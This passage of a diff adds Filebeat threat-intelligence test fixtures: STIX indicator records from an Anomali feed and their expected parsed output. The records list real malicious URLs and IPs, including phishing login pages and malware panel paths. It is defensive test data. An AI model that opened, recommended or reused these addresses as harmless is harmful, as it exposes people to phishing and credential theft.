mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-39"],"modified":"2020-02-25T02:52:38.025Z","name":"mal_ip: 81.177.135.161","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '81.177.135.161']","type":"indicator","valid_from":"2020-02-25T02:52:38.025Z"} +{"created":"2020-02-25T02:52:38.053Z","description":"TS ID: 55347597470; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--c36b85d9-df19-439b-8605-d7c4b0653977","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:52:38.053Z","name":"mal_url: http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:38.053Z"} +{"created":"2020-02-25T02:52:38.531Z","description":"TS ID: 55347597659; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--862bddc3-1b58-45b2-a40d-502d50369e0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-25T02:52:38.531Z","name":"mal_url: http://jusqit.com/2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jusqit.com/2/panel/admin.php']","type":"indicator","valid_from":"2020-02-25T02:52:38.531Z"} +{"created":"2020-02-25T02:52:38.564Z","description":"TS ID: 55347597488; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--d16f564b-6c1f-4515-97e7-d9a19515dd78","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-25T02:52:38.564Z","name":"mal_url: http://webupdateadobe.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://webupdateadobe.com/login']","type":"indicator","valid_from":"2020-02-25T02:52:38.564Z"} +{"created":"2020-02-25T02:52:40.276Z","description":"TS ID: 55347597520; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--2c31e18b-164e-42bc-afd8-04815a33e043","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:40.276Z","name":"mal_url: http://gsddfsfasa.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gsddfsfasa.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:40.276Z"} +{"created":"2020-02-25T02:52:40.317Z","description":"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:40.317Z","name":"mal_ip: 45.143.92.129","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.143.92.129']","type":"indicator","valid_from":"2020-02-25T02:52:40.317Z"} +{"created":"2020-02-25T02:52:40.344Z","description":"TS ID: 55347597474; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--387937df-4030-4cfe-91b7-bd9795985adc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:40.344Z","name":"mal_url: http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:40.344Z"} +{"created":"2020-02-25T02:52:41.781Z","description":"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:52:41.781Z","name":"mal_ip: 185.98.87.192","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.98.87.192']","type":"indicator","valid_from":"2020-02-25T02:52:41.781Z"} +{"created":"2020-02-25T02:52:52.59Z","description":"TS ID: 55347597566; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--4f92667a-5e1b-4111-88d4-e3e04405e97a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:52.59Z","name":"mal_url: http://farsson.com/~zadmin/10/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/10/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.59Z"} +{"created":"2020-02-25T02:52:52.623Z","description":"TS ID: 55347597530; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--04bc5b54-46ae-44d7-96a6-863481383436","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:52.623Z","name":"mal_url: http://anypontop.com/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://anypontop.com/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.623Z"} +{"created":"2020-02-25T02:52:52.674Z","description":"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--65a5607b-388a-4789-98d0-84d77ee94047","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:52.674Z","name":"mal_ip: 176.119.158.219","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.119.158.219']","type":"indicator","valid_from":"2020-02-25T02:52:52.674Z"} +{"created":"2020-02-25T02:52:52.712Z","description":"TS ID: 55347597467; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--b70344da-8137-4550-b569-97f0e3020ab1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:52:52.712Z","name":"mal_url: http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.712Z"} +{"created":"2020-02-25T02:52:55.912Z","description":"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime","id":"indicator--3ff92876-fac4-49a6-ae80-d123206dc224","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-25T02:52:55.912Z","name":"mal_ip: 195.54.33.150","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '195.54.33.150']","type":"indicator","valid_from":"2020-02-25T02:52:55.912Z"} +{"created":"2020-02-25T02:53:04.191Z","description":"TS ID: 55347597485; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--cb9b2721-6623-44c2-b1e5-143f2291738b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-25T02:53:04.191Z","name":"mal_url: http://belt-yard-74.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://belt-yard-74.myjino.ru/login']","type":"indicator","valid_from":"2020-02-25T02:53:04.191Z"} +{"created":"2020-02-25T02:53:12.657Z","description":"TS ID: 55347597478; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--04c56a59-3a16-4284-9edc-5445bb539ce5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:53:12.657Z","name":"mal_url: http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:12.657Z"} +{"created":"2020-02-25T02:53:15.804Z","description":"TS ID: 55347597559; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--1989ffaf-19a7-4850-b142-d31758a3751f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:15.804Z","name":"mal_url: http://farsson.com/~zadmin/11/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/11/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:15.804Z"} +{"created":"2020-02-25T02:53:15.88Z","description":"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime","id":"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-25T02:53:15.88Z","name":"mal_ip: 104.227.250.186","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '104.227.250.186']","type":"indicator","valid_from":"2020-02-25T02:53:15.88Z"} +{"created":"2020-02-25T02:53:17.191Z","description":"TS ID: 55347597555; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fe0a731e-e2ff-49ac-a597-150ce46a31fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:17.191Z","name":"mal_url: http://farsson.com/~zadmin/12/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/12/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.191Z"} +{"created":"2020-02-25T02:53:17.224Z","description":"TS ID: 55347597468; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--53d00201-4c9a-4275-9091-4cf08fda4676","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:53:17.224Z","name":"mal_url: http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.224Z"} +{"created":"2020-02-25T02:53:17.256Z","description":"TS ID: 55347597466; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--4e154929-35ec-4f71-8793-6b861a9a98f1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:53:17.256Z","name":"mal_url: http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.256Z"} +{"created":"2020-02-25T02:53:17.916Z","description":"TS ID: 55347597583; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--4ce097b7-254b-41cf-8c7d-934524548fd6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:17.916Z","name":"mal_url: http://farsson.com/~zadmin/8/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/8/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.916Z"} +{"created":"2020-02-25T02:53:17.952Z","description":"TS ID: 55347597508; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--51f063d7-600f-43c3-9f88-92e4b3b603da","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:53:17.952Z","name":"mal_url: http://petrouretro.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://petrouretro.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.952Z"} +{"created":"2020-02-25T02:53:17.983Z","description":"TS ID: 55347597481; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--5c9b2227-96df-4cc8-ba6b-c23f4da9667a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-25T02:53:17.983Z","name":"mal_url: http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.983Z"} +{"created":"2020-02-25T02:53:36.323Z","description":"TS ID: 55347597534; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--751b74f4-ded7-426d-b425-cb9c2b3113a8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:53:36.323Z","name":"mal_url: http://agmardorecha.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://agmardorecha.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:36.323Z"} +{"created":"2020-02-25T02:53:36.382Z","description":"TS ID: 55347597492; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--4fcbf6f5-5acc-42da-acb0-497583b3388d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-25T02:53:36.382Z","name":"mal_url: http://149.28.186.68/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://149.28.186.68/login']","type":"indicator","valid_from":"2020-02-25T02:53:36.382Z"} +{"created":"2020-02-25T02:53:36.421Z","description":"TS ID: 55347597464; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--713e0d5f-3842-410f-98d8-25fe0f5b15db","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:53:36.421Z","name":"mal_url: http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:36.421Z"} +{"created":"2020-02-25T02:53:42.111Z","description":"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-25T02:53:42.111Z","name":"mal_url: http://45.14.14.191/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.14.14.191/login']","type":"indicator","valid_from":"2020-02-25T02:53:42.111Z"} +{"created":"2020-02-25T02:54:16.295Z","description":"TS ID: 55347597622; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--86fd616d-f6a3-45ff-a3a8-db1aa59defd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:54:16.295Z","name":"mal_url: http://farsson.com/~zadmin/4/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/4/login.php']","type":"indicator","valid_from":"2020-02-25T02:54:16.295Z"} +{"created":"2020-02-25T02:54:21.544Z","description":"TS ID: 55347597482; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--57fb3a6f-09ca-44a2-b309-724b570e1fd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-25T02:54:21.544Z","name":"mal_url: http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:21.544Z"} +{"created":"2020-02-25T02:54:32.178Z","description":"TS ID: 55347597608; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--1b2dfaef-5caa-4114-9634-cf2f9959dbfb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:54:32.178Z","name":"mal_url: http://farsson.com/~zadmin/5/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/5/login.php']","type":"indicator","valid_from":"2020-02-25T02:54:32.178Z"} +{"created":"2020-02-25T02:54:37.327Z","description":"TS ID: 55347597484; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--44544bfd-7131-4530-a9de-96c1840101c1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:54:37.327Z","name":"mal_url: http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:37.327Z"} +{"created":"2020-02-25T02:54:37.383Z","description":"TS ID: 55347597463; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--51779de2-0d07-4d60-abf6-afdc0dfc7637","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:54:37.383Z","name":"mal_url: http://0ooo.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://0ooo.xyz/login']","type":"indicator","valid_from":"2020-02-25T02:54:37.383Z"} +{"created":"2020-02-25T02:54:48.929Z","description":"TS ID: 55347597475; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--b7d14453-ad19-4246-961a-72f0e5136874","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:54:48.929Z","name":"mal_url: http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:48.929Z"} +{"created":"2020-02-25T02:54:54.632Z","description":"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--064f2766-97b6-481d-a273-f80a97524be8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:54:54.632Z","name":"mal_ip: 190.97.162.37","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '190.97.162.37']","type":"indicator","valid_from":"2020-02-25T02:54:54.632Z"} +{"created":"2020-02-25T02:55:06.15Z","description":"TS ID: 55347597650; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--3f3bca20-c218-431d-8250-0f600b011971","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:06.15Z","name":"mal_url: http://farsson.com/~zadmin/1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/1/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:06.15Z"} +{"created":"2020-02-25T02:55:06.186Z","description":"TS ID: 55347597472; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--6b3d6689-75e8-4f50-a1c0-f1a1e6158493","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:55:06.186Z","name":"mal_url: http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:55:06.186Z"} +{"created":"2020-02-25T02:55:06.314Z","description":"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--1306883c-b911-4116-9121-492450e4bb07","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-25T02:55:06.314Z","name":"mal_url: http://92.63.197.191/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.191/login']","type":"indicator","valid_from":"2020-02-25T02:55:06.314Z"} +{"created":"2020-02-25T02:55:27.523Z","description":"TS ID: 55347597627; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d4a02ea1-435f-472e-8013-07e4e24f5a2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:27.523Z","name":"mal_url: http://farsson.com/~zadmin/3/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/3/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:27.523Z"} +{"created":"2020-02-25T02:55:35.424Z","description":"TS ID: 55347597528; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--1e8d894d-1e8b-4ba9-ae25-1e3e00c055ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-25T02:55:35.424Z","name":"mal_url: http://atomicwallet.email/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atomicwallet.email/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:35.424Z"} +{"created":"2020-02-25T02:55:35.462Z","description":"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--cb377636-13ce-421e-926f-e33e2b954263","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:55:35.462Z","name":"mal_url: http://190.97.162.37/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://190.97.162.37/login']","type":"indicator","valid_from":"2020-02-25T02:55:35.462Z"} +{"created":"2020-02-25T02:55:35.496Z","description":"TS ID: 55347597477; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--1163cdee-566a-404a-b66e-657857eb4af3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:55:35.496Z","name":"mal_url: http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:55:35.496Z"} +{"created":"2020-02-25T02:55:39.691Z","description":"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:39.691Z","name":"mal_ip: 195.133.201.191","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '195.133.201.191']","type":"indicator","valid_from":"2020-02-25T02:55:39.691Z"} diff --git a/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json new file mode 100644 index 000000000000..69205da6d594 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json @@ -0,0 +1,3412 @@ +[ + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 0, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:57.431Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:57.431Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work6/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 609, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-68" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:57.503Z", + "threatintel.anomali.name": "mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:57.503Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "worldatdoor.in", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 1255, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-71" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:57.570Z", + "threatintel.anomali.name": "mal_url: http://f0387770.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0387770.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:57.570Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0387770.xsph.ru", + "threatintel.indicator.url.original": "http://f0387770.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 1867, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332312; iType: mal_url; State: active; 